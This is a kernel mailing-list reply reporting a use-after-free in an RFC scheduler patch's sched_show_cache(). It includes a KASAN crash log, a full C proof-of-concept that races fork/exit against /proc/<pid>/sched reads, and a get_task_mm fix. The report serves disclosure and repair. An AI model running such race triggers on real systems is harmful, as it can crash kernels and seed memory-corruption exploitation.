Re: [RFC PATCH 8/8] sched/debug: Print task preferred LLC for scheduler debugging

From: XIAO WU

Date: Sun Jun 28 2026 - 15:29:43 EST

Hi Jianyong,

I came across the Sashiko AI review of this series and reproduced the
use-after-free it flagged in sched_show_cache() — a KASAN
slab-use-after-free triggers when reading /proc/<pid>/sched while the
target task is concurrently exiting.

The Sashiko review is at:
https://sashiko.dev/#/patchset/20260625030759.25928-1-wujianyong@xxxxxxxx

> +static void sched_show_cache(struct task_struct *p, struct seq_file *m)
> +{
> +#ifdef CONFIG_SCHED_CACHE
> + struct mm_struct *mm = p->mm;
> + int sc_cpu, sc_llc, sc_node, pref_llc, pref_node;
> +
> + if (!mm)
> + return;
> +
> + sc_cpu = READ_ONCE(mm->sc_stat.cpu);

This saves p->mm into a local variable and checks it for NULL, but
does so without holding task_lock(p) or taking a reference via
get_task_mm(). If the target task is concurrently exiting,
exit_mm() can drop the final reference and free the mm_struct
between the NULL check and the READ_ONCE(mm->sc_stat.cpu) access,
resulting in a slab-use-after-free.

The access happens from proc_sched_show_task() which is reachable
via /proc/<pid>/sched — userspace can trigger this for any visible
task by simply reading the proc file while the task exits.

=== Reproduction ===

Kernel: 7.1.0-rc2-gd93b88951718 #1 PREEMPT(full)
Arch: x86_64 (QEMU Standard PC Q35 + ICH9, 2009)
Config: CONFIG_KASAN=y, CONFIG_SCHED_CACHE=y

Trigger: race fork/exit against /proc/<pid>/sched reads. 16 worker
threads each fork children and read /proc/<child_pid>/sched while
the child immediately exits.

=== Crash Log ===

[ 991.032119][T535366] BUG: KASAN: slab-use-after-free in proc_sched_show_task+0x30c7/0x3470
[ 991.032971][T535366] Read of size 4 at addr ffff88802fe0d960 by task poc/535366
[ 991.033952][T535366] CPU: 1 UID: 0 PID: 535366 Comm: poc Not tainted 7.1.0-rc2-gd93b88951718 #1 PREEMPT(full)
[ 991.033962][T535366] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009)
[ 991.033967][T535366] Call Trace:
[ 991.033970][T535366] <TASK>
[ 991.033973][T535366] dump_stack_lvl+0x116/0x1f0
[ 991.033989][T535366] print_report+0xf4/0x600
[ 991.034021][T535366] kasan_report+0xe0/0x110
[ 991.034032][T535366] ? proc_sched_show_task+0x30c7/0x3470
[ 991.034043][T535366] proc_sched_show_task+0x30c7/0x3470
[ 991.034054][T535366] sched_show+0xf4/0x1b0
[ 991.034062][T535366] seq_read_iter+0x513/0x12d0
[ 991.034074][T535366] seq_read+0x3b1/0x590
[ 991.034093][T535366] vfs_read+0x1e9/0xd00
[ 991.034153][T535366] ksys_read+0x12f/0x250
[ 991.034220][T535366] do_syscall_64+0x129/0x880
[ 991.034240][T535366] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 991.034250][T535366] </TASK>

The Read of size 4 at an offset into a freed mm_struct matches the
READ_ONCE(mm->sc_stat.cpu) access racing against exit_mm().

=== PoC ===

Build: gcc -o poc poc.c -static
Run: ./poc

/* sched_show_cache UAF PoC — race fork/exit against /proc/<pid>/sched */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/wait.h>

static void worker(void)
{
char buf[64], path[64];
for (int i = 0; i < 50000000; i++) {
pid_t pid = fork();
if (pid == 0) { _exit(0); }
if (pid > 0) {
snprintf(path, 64, "/proc/%d/sched", pid);
int fd = open(path, O_RDONLY);
if (fd >= 0) { read(fd, buf, 63); close(fd); }
}
}
_exit(0);
}

int main(void)
{
signal(SIGCHLD, SIG_IGN);
for (int i = 0; i < 16; i++)
if (fork() == 0) { worker(); }
while (wait(NULL) > 0);
return 0;
}

The fix is to use get_task_mm(p) / mmput(mm) around the mm access,
which safely pins the mm_struct for the duration of the read.

Thanks,
Xiao